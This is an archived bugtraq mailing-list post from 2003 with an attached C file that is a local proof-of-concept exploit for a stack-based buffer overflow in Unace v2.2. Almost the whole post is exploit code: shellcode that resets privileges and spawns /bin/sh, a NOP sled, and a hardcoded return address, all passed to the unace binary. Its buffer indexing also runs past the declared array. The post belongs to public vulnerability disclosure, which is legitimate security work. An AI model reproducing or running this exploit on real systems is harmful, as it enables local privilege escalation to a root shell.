[32378] in bugtraq

home help back first fref pref prev next nref lref last post

Local PoC exploit for Unace v2.2

daemon@ATHENA.MIT.EDU (demz)
Tue Nov 11 16:00:44 2003

Message-ID: <002d01c3a7e2$c530e7f0$0400a8c0@demzaki21a0svz>
From: "demz" <demz@geekz.nl>
To: <bugtraq@securityfocus.com>
Date: Tue, 11 Nov 2003 00:31:30 +0100
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_002A_01C3A7EB.26E30070"

------=_NextPart_000_002A_01C3A7EB.26E30070
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Local proof of concept exploit for Unace v2.2

demz
demz@geekz.nl // www.geekz.nl
------=_NextPart_000_002A_01C3A7EB.26E30070
Content-Type: application/octet-stream;
	name="gEEk-unace.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
	filename="gEEk-unace.c"

/* gEEk-unace.c=0A=
 *=0A=
 * PoC exploit made for advisory based uppon an local stack based =
overflow.=0A=
 * Vulnerable versions, maybe also prior versions:=0A=
 *=0A=
 * Unace v2.2=0A=
 *=0A=
 * Tested on:  Debian 3.0=0A=
 *=0A=
 * Advisory source: MegaHz=0A=
 * http://www.securityfocus.com/archive/1/344065/2003-11-07/2003-11-13/0=0A=
 *=0A=
 * -----------------------------------------=0A=
 * coded by: demz (geekz.nl) (demz@geekz.nl)=0A=
 * -----------------------------------------=0A=
 *=0A=
 */=0A=
=0A=
#include <stdio.h>=0A=
#include <stdlib.h>=0A=
=0A=
char shellcode[]=3D=0A=
=0A=
	"\x31\xc0"                      // xor          eax, eax=0A=
        "\x31\xdb"                      // xor          ebx, ebx=0A=
        "\x31\xc9"                      // xor          ecx, ecx=0A=
        "\xb0\x46"                      // mov          al, 70=0A=
        "\xcd\x80"                      // int          0x80=0A=
=0A=
        "\x31\xc0"                      // xor          eax, eax=0A=
        "\x50"                          // push         eax=0A=
        "\x68\x6e\x2f\x73\x68"          // push  long   0x68732f6e=0A=
        "\x68\x2f\x2f\x62\x69"          // push  long   0x69622f2f=0A=
        "\x89\xe3"                      // mov          ebx, esp=0A=
        "\x50"                          // push         eax=0A=
        "\x53"                          // push         ebx=0A=
        "\x89\xe1"                      // mov          ecx, esp=0A=
        "\x99"                          // cdq=0A=
        "\xb0\x0b"                      // mov          al, 11=0A=
        "\xcd\x80"                      // int          0x80=0A=
=0A=
        "\x31\xc0"                      // xor          eax, eax=0A=
        "\xb0\x01"                      // mov          al, 1=0A=
        "\xcd\x80";                     // int          0x80=0A=
=0A=
int main()=0A=
{=0A=
	unsigned long ret =3D 0xbfffc260;=0A=
=0A=
	char buffer[707];=0A=
	int i=3D0;=0A=
=0A=
	memset(buffer, 0x90, sizeof(buffer));=0A=
=0A=
	for (0; i < strlen(shellcode) - 1;i++)=0A=
	buffer[300 + i] =3D shellcode[i];=0A=
=0A=
	buffer[707] =3D (ret & 0x000000ff);=0A=
	buffer[708] =3D (ret & 0x0000ff00) >> 8;=0A=
	buffer[709] =3D (ret & 0x00ff0000) >> 16;=0A=
	buffer[710] =3D (ret & 0xff000000) >> 24;=0A=
	buffer[711] =3D 0x0;=0A=
=0A=
	printf("\nUnace v2.2 local exploit\n");=0A=
        printf("---------------------------------------- demz @ geekz.nl =
--\n");=0A=
=0A=
	execl("./unace", "unace", "e", buffer, NULL);=0A=
}=0A=
=0A=

------=_NextPart_000_002A_01C3A7EB.26E30070--
home help back first fref pref prev next nref lref last post